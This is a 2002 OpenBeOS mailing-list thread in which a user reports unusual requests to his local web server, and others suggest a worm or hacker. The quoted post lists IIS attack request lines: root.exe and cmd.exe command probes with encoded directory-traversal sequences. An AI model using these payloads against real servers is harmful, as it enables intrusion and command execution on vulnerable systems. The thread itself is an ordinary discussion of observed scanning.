[openbeos] Re: SV: I think someone tried to hack into my machine
- From: RichardCrawford <RichardCrawford@xxxxxxxxxxxxx>
- To: openbeos@xxxxxxxxxxxxx
- Date: Tue, 19 Mar 2002 07:32:48 -0800 (-0800)
Actually, I noticed some rather odd requests on a temporarily running
web server on my IP the other day. I just took it as noise from the
local network, but if it happens again I will note it more thouroughly.
> It can sure be a hacker.. But it could be a virus somewhere who are
> trying
> all those IE hacks..
> We se those things in our web log files every day at work..
>
> //Mikael H , #E-1613
>
> > -----Ursprungligt meddelande-----
> > Från: openbeos-bounce@xxxxxxxxxxxxx
> > [mailto:openbeos-bounce@xxxxxxxxxxxxx]För Daniel Reinhold
> > Skickat: den 19 mars 2002 08:49
> > Till: Public OBOS mailing list
> > Ämne: [openbeos] I think someone tried to hack into my machine
> >
> >
> > Ok, this was rather interesting. It happened just about
> > fifteen minutes
> > ago (as I'm writing this).
> >
> > I'm online (PPP dialup) and am also running a local webserver (i.e.
> > sending requests to loopback address 127.0.0.1). Yeah, that's
> > asking
> > for trouble, at least theoretically. That is, someone on the
> > internet,
> > if they happened to get a hold of my (temporary, dynamically
> > assigned)
> > IP, could send requests for local files and have them sent back out
> > across the network. I've never had anything weird happen before, so
> > I've always been pretty blase about the security risk.
> >
> > Anyway, I'm just testing some news items locally before copying
> > them
> > over to the OpenBeOS website (which is my usual MO).
> > Suddenly, I notice
> > the Terminal window (largely covered by another window, but
> > partially
> > showing) has a flurry of text flying by and the DUN replicant in
> > the
> > Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
> > uncover the Terminal window (which is running the webserver) and
> > see
> > that a number of unusual requests have just been attended to.
> > Here's
> > the first one:
> >
> > GET /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
> >
> > The remaining requests all look like that but with different
> > URLs. Here
> > are the other URLs that were requested:
> >
> > GET /MSADC/root.exe?/c+dir HTTP/1.0
> > GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?
> > /c+
> > dir HTTP/1.0
> > GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?
> > /c+
> > dir HTTP/1.0
> > GET
> > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
> > /winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> >
> > To me, that looks all the world like some hacker trying to grab
> > files
> > from my local machine. Could there be another explanation?
> >
> > Of course, I'm running BeOS (and don't have NT) so my local
> > webserver
> > just returned a bunch of 404 (Not found) responses. Still, makes
> > you
> > wonder.
> >
> > Has anyone else on this list had any similar experiences? What do
> > you
> > make of this?
> >
> >
>
>
Other related posts:
